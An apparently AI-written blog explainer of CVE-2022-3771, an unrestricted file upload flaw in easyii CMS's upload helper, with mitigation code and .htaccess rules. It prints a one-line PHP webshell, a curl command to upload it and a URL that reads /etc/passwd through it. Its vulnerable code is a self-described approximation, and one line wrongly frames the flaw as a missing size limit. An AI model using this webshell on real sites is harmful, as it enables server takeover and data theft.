CVE-2022-3771 - Critical Unrestricted File Upload in easyii CMS (VDB-212501) – Explained

In late 2022, a high-impact vulnerability surfaced in easyii CMS. Labeled as CVE-2022-3771 (also known as VDB-212501), it enables attackers to upload files without restriction via the "Upload" helper, putting countless installations at risk. In this post, we'll break down what went wrong, how attackers can exploit it, and ways to safeguard your site.

What is easyii CMS?

easyii CMS is an open-source content management system built for Yii2, widely used in small-to-medium web projects due to its simplicity and flexibility.

The Vulnerability: Unrestricted File Upload

The root of the issue is in helpers/Upload.php, which handles file uploads for admin users. Unfortunately, the logic for validating uploaded files is flawed, letting attackers upload *any type of file* – including malicious scripts.

Where's the Problem?

When uploading a file in easyii CMS, the function responsible is something like this (simplified for clarity):

// helpers/Upload.php

public static function upload($file) {
    $fileName = uniqid() . '.' . $file->extension;
    $filePath = Yii::getAlias('@webroot') . '/uploads/' . $fileName;
    if ($file->saveAs($filePath)) {
        return '/uploads/' . $fileName;
    }
    return false;
}

There's NO size limit in this context.

This means an attacker could upload a PHP file, a .htaccess, or anything malicious, and the CMS would happily save it to the web-accessible /uploads directory.

Exploit Example: How an Attacker Might Abuse This

Suppose an attacker finds the file upload form (e.g., for uploading images in the CMS admin). They use a tool like Burp Suite or curl to POST a malicious file, such as shell.php containing code like:

<?php system($_GET['cmd']); ?>

They upload it, it lands in /uploads/shell.php, and then they access

http://<victim-site>/uploads/shell.php?cmd=cat /etc/passwd

If successful, the attacker can run commands remotely, gaining full control.

Here's a simple curl example to upload a webshell

curl -F "file=@shell.php" http://<victim-site>/path/to/upload

Now, open http://<victim-site>/uploads/shell.php in a browser or via curl to execute system commands.

References and Further Reading

- Original easyii CMS Repo
- Vuldb Advisory (VDB-212501)
- Exploit Details at exploit-db (if available)
- OWASP Unrestricted File Upload

How to Protect Your Site

If you use easyii CMS, update immediately. If a patch does not exist, *change your code* to restrict allowed file types:

$allowed = ['jpg', 'jpeg', 'png', 'gif'];
if (!in_array(strtolower($file->extension), $allowed)) {
    throw new \Exception('Invalid file type!');
}

Also, never allow direct execution of files in uploads – use a .htaccess to block .php

# .htaccess in /uploads
<Files *.php>
    Deny from all
</Files>

Conclusion

CVE-2022-3771 in easyii CMS is a textbook example of why file upload validation is critical. If you manage any easyii CMS sites, act now to patch or mitigate this flaw. Unrestricted file uploads are among the most dangerous vulnerabilities, and exploitation is easy – don’t wait for attackers to strike.

Stay safe, and always validate your inputs!

*Exclusive text by ChatGPT. Content adapted from public vulnerability sources. For official updates, check the original repository and security advisories.*

Timeline

Published on: 10/31/2022 14:15:00 UTC
Last modified on: 11/01/2022 14:08:00 UTC